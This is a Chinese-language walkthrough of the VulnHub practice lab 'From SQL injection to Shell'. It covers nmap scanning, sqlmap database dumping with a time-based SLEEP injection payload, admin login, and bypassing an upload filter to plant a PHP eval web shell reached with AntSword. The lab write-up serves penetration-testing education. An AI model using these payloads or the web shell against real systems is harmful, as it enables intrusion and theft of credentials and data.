当前位置: 首页 > news >正文

vulnhub靶场From SQL injection to Shell

一、概括

  1. 通过基础潘顿和推测网页存在sql注入漏洞
  2. 验证存在漏洞
  3. 利用sql注入获得数据库中敏感数据,登录到网页管理员页面
  4. 发现存在文件上传漏洞
  5. 利用文件上传漏洞,获取服务器的信息

二、通关过程

  1. nmap获得靶机访问地址

  1. 通过靶机的mac地址和探测结果,得出靶机IP地址

  2. 浏览器访问地址

  1. 首页没有发现什么明显内容,访问其它网页发现存在特殊参数id,五i测存在sql漏洞,这里还发现了登录页面

  1. sqlmap探测漏洞
sqlmap-u"http://192.168.8.155/cat.php?id=1"--batch

  1. 验真是否存在
id=2AND(SELECT5851FROM(SELECT(SLEEP(5)))nqWc)

  1. 页面存在明显的延迟,那就是探测无误,存在sql注入
  2. 获取数据
sqlmap -u "http://192.168.8.155/cat.php?id=1" -D photoblog -T users --dump

  1. 获得用户名密码,登录后台查看信息

  1. 页面存在文件上传,推测存在漏洞

  2. 创建一个文件试试看,写入

<?php eval($_POST['cmd']);?>
  1. 直接上传发现提示,无法上传php文件,那试试php3等文件后缀

  1. 通过访问本页面的其它图片判断图片存放位置

  1. 蚁剑连接测试

  1. 连接成功,访问其它文件即可
http://www.jsqmd.com/news/1079819/

相关文章:

  • 工业高危环境防爆监控选型技术指南|广东化工 / 矿用场景设备合规与落地方案分析
  • IACheck AI报告文档审核|自动识别合规要素漏洞,杜绝管材压扁试验报告签字签章缺失问题
  • 【计算机毕业设计案例】基于 SpringBoot + 小程序的儿童预防接种综合管理系统设计与实现(程序+文档+讲解+定制)
  • 【毕业设计】基于 SpringBoot 的消防知识在线答题与竞赛系统设计与实现 轻量化消防安全知识闯关竞赛小程序设计与实现(源码+文档+远程调试,全bao定制等)
  • 全光校园网络等保合规建设方案
  • sqlserver设置最大占用内存
  • 链路追踪:SkyWalking, Zipkin 入门
  • 华为交换机风扇异常处理
  • Playwright与pytest-playwright:从自动化库到测试框架的深度解析
  • 告别大学生笔记内耗!实测AI语音转写工具,解锁高效学习方式
  • 计算机小程序毕设实战-基于 SpringBoot 的移动端消防知识答题竞赛平台设计与实现 面向校园普及的消防安全知识竞赛小程序设计与实现【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • 别再加个“聊天框”自欺欺人了!2026企业AI大脑生死战:大模型撕掉伪智能面具的终极对决
  • 抢演唱会门票稳了|鸿蒙6.1+抢票引擎,华为nova16系列让我抢票率飙升
  • 免费图片去水印工具实操步骤:从网页到本地再到小程序,完整去水印流程
  • 企业AI品牌测评中的样本量与统计可靠性分析
  • 合同统计分析:让数据参与经营判断
  • 鸿蒙 EventBus 与 Message 通信机制详解
  • 【回眸】Agent-Studio 智能体开发与应用实战指南
  • 不用再抱着摄像头调试了!国标GB28181设备端EasyGBD Windows桌面版,国标开发效率直接拉满
  • 视频去水印软件推荐:亲测横评,免费好用的电脑手机与在线方案一次说清
  • Ricon组态 - 让数据可视化如此简单
  • 2026年AI智能体培训赛道深度评测:从低代码平台到业务落地的全链路实践
  • AI/Vibe Coding,本质是软件人工时代向软件工业时代发展
  • 哨兵机制Sentinel集群搭建
  • Java计算机毕设之基于 SpringBoot 的住宿订单统计与客房管理系统设计与实现 中小型酒店客房运维与入住服务系统设计与实现(完整前后端代码+说明文档+LW,调试定制等)
  • 基于Qwen3-4B与OpenClaw的AI智能体UI自动化测试实践
  • 计算机小程序毕设实战-基于 SpringBoot 的校园社团信息化管理平台设计与实现 面向高校师生的社团运营管理小程序系统设计与实现【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • 【无标题】补充章节:反物质的拓扑路径起源
  • 实现 Tab 切换面板(动态组件)Demo
  • WISV:无线感知语义验证如何加速边缘LLM分布式推理